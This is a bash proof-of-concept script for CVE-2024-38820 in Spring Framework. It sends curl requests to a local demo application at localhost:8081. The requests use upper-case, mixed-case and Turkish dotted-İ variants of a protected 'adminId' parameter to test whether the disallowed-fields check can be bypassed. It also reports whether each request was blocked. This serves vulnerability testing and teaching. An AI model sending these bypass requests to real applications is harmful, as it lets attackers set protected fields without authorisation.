#!/bin/bash
# CVE-2024-38820 Test Script
# This script demonstrates the locale-dependent case conversion vulnerability in Spring Framework
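echo "=========================================="
echo "CVE-2024-38820 Proof of Concept Test"
echo "=========================================="
echo ""

# Base URL of the locally running demo application under test.
APP_URL="http://localhost:8081"

# Liveness probe against GET /test.
# --fail makes curl exit non-zero on an HTTP error status, so a listener that
# answers /test with 4xx/5xx is not mistaken for a healthy application and the
# later verdicts are not computed from error pages. The two timeouts keep the
# script from hanging on a socket that accepts but never answers.
echo "🔍 Checking if application is running at $APP_URL..."
if ! curl --silent --fail --connect-timeout 5 --max-time 10 \
    --output /dev/null "$APP_URL/test"; then
  echo "❌ Application is not running. Please start it first with: mvn spring-boot:run"
  echo " Then run this test script again."
  exit 1
fi
echo "✅ Application is running!"
echo ""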
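#######################################
# Send one GET request and split curl's output into body and status code.
# Arguments: $1 - full request URL
# Globals:   LAST_BODY (written)   - response body, may be empty
#            LAST_STATUS (written) - HTTP status; 000 when no response arrived
#######################################
probe() {
  local raw
  # -w appends the status on its own final line, so a single request yields
  # both the body and the status without a second round trip.
  raw=$(curl -s --max-time 10 -w '\n%{http_code}' "$1")
  LAST_STATUS=${raw##*$'\n'}
  LAST_BODY=${raw%$'\n'*}
}

# Test 1: exact-case field name; the binder is expected to reject it.
echo "📋 Test 1: Normal field name (should be BLOCKED)"
echo "Request: GET /user?username=test&adminId=999"
probe "$APP_URL/user?username=test&adminId=999"
RESPONSE1=$LAST_BODY
echo "Response: $RESPONSE1"
echo "HTTP status: $LAST_STATUS"
echo ""

# Test 2: upper-case field name (may bypass in Turkish locale).
echo "📋 Test 2: Uppercase field name (may BYPASS)"
echo "Request: GET /user?username=test&ADMINID=999"
probe "$APP_URL/user?username=test&ADMINID=999"
RESPONSE2=$LAST_BODY
echo "Response: $RESPONSE2"
echo "HTTP status: $LAST_STATUS"
echo ""

# Test 3: mixed-case field name (may bypass).
echo "📋 Test 3: Mixed case field name (may BYPASS)"
echo "Request: GET /user?username=test&AdminId=999"
probe "$APP_URL/user?username=test&AdminId=999"
RESPONSE3=$LAST_BODY
echo "Response: $RESPONSE3"
echo "HTTP status: $LAST_STATUS"
echo ""

# Test 4: field name containing the Turkish dotted capital İ (U+0130).
# The character is sent percent-encoded as UTF-8 (%C4%B0). A raw non-ASCII
# byte in the request line is not valid URL syntax and may be rejected by the
# HTTP layer before parameter binding runs; such a rejection would otherwise
# be reported as "blocked" even though the binder was never exercised.
echo "📋 Test 4: Turkish İ character (may BYPASS)"
echo "Request: GET /user?username=test&ADMİNID=999"
probe "$APP_URL/user?username=test&ADM%C4%B0NID=999"
RESPONSE4=$LAST_BODY
echo "Response: $RESPONSE4"
echo "HTTP status: $LAST_STATUS"
echo ""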
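# Test 5: print what GET /test returns (the page describes it as locale
# information). Uses APP_URL rather than a second hard-coded copy of the
# address, so the probes cannot drift apart from the liveness check.
echo "📋 Test 5: Locale information"
echo "Request: GET /test"
TEST5_RESPONSE=$(curl -s --max-time 10 "$APP_URL/test")
echo "$TEST5_RESPONSE"
echo ""

# Test 6: query the demo endpoint with an upper-case field name.
# NOTE(review): presumably the endpoint reports how the name is lower-cased
# under the configured locale; confirm against the controller.
echo "📋 Test 6: Direct vulnerability demonstration"
echo "Request: GET /vulnerability-demo?testField=ADMINID"
TEST6_RESPONSE=$(curl -s --max-time 10 "$APP_URL/vulnerability-demo?testField=ADMINID")
echo "$TEST6_RESPONSE"
echo ""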
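# Summary
echo "=========================================="
echo "🎯 VULNERABILITY ANALYSIS:"
echo "=========================================="

#######################################
# Classify one captured response body.
# Arguments: $1 - response body as captured by the test
# Outputs:   one word on stdout: bypassed | blocked | inconclusive
#
# An empty body is reported as inconclusive rather than blocked: curl -s
# leaves the variable empty when the request fails outright, and treating that
# as "protected" would give false assurance. A non-empty error page still
# counts as "blocked" here, so read the raw responses printed by the tests
# before trusting a PROTECTED verdict.
#######################################
classify_response() {
  local body=$1
  if [[ -z "$body" ]]; then
    printf 'inconclusive\n'
  elif [[ "$body" == *"adminId bypassed"* ]]; then
    printf 'bypassed\n'
  else
    printf 'blocked\n'
  fi
}

case "$(classify_response "$RESPONSE1")" in
  bypassed) echo "❌ Test 1 FAILED: Normal case should be blocked but was bypassed!" ;;
  blocked) echo "✅ Test 1 PASSED: Normal case correctly blocked" ;;
  *) echo "⚠️ Test 1 INCONCLUSIVE: empty response, request may not have reached the application" ;;
esac

case "$(classify_response "$RESPONSE2")" in
  bypassed) echo "🚨 Test 2 VULNERABILITY: Uppercase bypass SUCCESSFUL!" ;;
  blocked) echo "✅ Test 2 PROTECTED: Uppercase case blocked" ;;
  *) echo "⚠️ Test 2 INCONCLUSIVE: empty response, request may not have reached the application" ;;
esac

case "$(classify_response "$RESPONSE3")" in
  bypassed) echo "🚨 Test 3 VULNERABILITY: Mixed case bypass SUCCESSFUL!" ;;
  blocked) echo "✅ Test 3 PROTECTED: Mixed case blocked" ;;
  *) echo "⚠️ Test 3 INCONCLUSIVE: empty response, request may not have reached the application" ;;
esac

case "$(classify_response "$RESPONSE4")" in
  bypassed) echo "🚨 Test 4 VULNERABILITY: Turkish İ bypass SUCCESSFUL!" ;;
  blocked) echo "✅ Test 4 PROTECTED: Turkish İ blocked" ;;
  *) echo "⚠️ Test 4 INCONCLUSIVE: empty response, request may not have reached the application" ;;
esac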
# Closing notes: where to inspect the locale conversion, how to switch the
# application's locale, and a short recap of the CVE. Emitted as one here-doc;
# only $APP_URL is expanded.
cat <<EOF

💡 To see detailed locale conversion information, visit: $APP_URL/test

🔧 To change locale settings:
 1. Edit src/main/resources/application.properties
 2. Set different locale values (tr_TR, en_US, etc.)
 3. Restart the application

📚 CVE-2024-38820 Summary:
 - Affects Spring Framework's DataBinder disallowedFields protection
 - String.toLowerCase() behavior varies by locale
 - In Turkish locale, 'I' becomes 'ı' (dotless i) instead of 'i'
 - This can bypass field protection mechanisms
==========================================
EOF